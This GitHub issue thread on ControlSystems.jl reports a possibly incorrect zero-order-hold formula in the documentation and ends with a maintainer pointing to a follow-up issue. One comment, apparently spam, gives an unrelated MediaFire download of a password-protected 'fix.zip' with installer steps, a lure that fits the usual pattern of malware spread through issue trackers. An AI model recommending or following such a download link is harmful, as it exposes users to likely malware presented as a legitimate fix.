### ISSUE TITLE
An incorrect formula in the documentation

### ISSUE THREAD

**Issue by nakorae** [JuliaControl/ControlSystems.jl#932]
there may be an error in the formula for the ZoH.
https://github.com/JuliaControl/ControlSystems.jl/blob/2cb622d6d97db3e243adc7f7907b7db5d3b514e6/docs/src/examples/zoh.md?plain=1#L13-L19
I believe the correct formula is `Z(s) = \dfrac{1 - e^{-T_s s}}{T_s s} `.
Furthermore, I believe this is also incorrect.
https://github.com/JuliaControl/ControlSystems.jl/blob/2cb622d6d97db3e243adc7f7907b7db5d3b514e6/docs/src/examples/zoh.md?plain=1#L23

I'm sorry for my unclear English...

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by baggepinnen** [comment]
See #933
